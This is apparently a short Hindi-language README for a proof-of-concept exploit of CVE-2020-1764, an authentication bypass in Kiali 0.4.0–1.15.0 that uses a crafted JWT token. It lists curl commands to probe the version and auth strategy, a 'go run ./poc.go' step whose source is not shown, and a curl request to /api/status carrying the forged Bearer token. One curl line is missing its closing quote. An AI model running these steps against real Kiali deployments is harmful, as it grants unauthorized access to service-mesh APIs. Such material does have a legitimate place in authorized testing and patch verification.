
CVE-2020-1764 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Kiali 0.4.0–1.15.0 में प्रमाणीकरण बायपास, जो क्राफ्टेड JWT टोकन के माध्यम से अनधिकृत API एक्सेस सक्षम करता है।
लॉगिन प्रमाणीकरण रणनीति का उपयोग करते हुए Kiali 0.4.0 से 1.15.0 के लिए प्रमाणीकरण बायपास PoC (सुरक्षा बुलेटिन)
संस्करण जांचें: curl 'http://<IP>/api
प्रमाणीकरण रणनीति जांचें: curl 'http://<IP>/api/auth/info'
go run ./poc.go
curl 'http://<IP>/api/status' -H "Authorization: Bearer $JWT"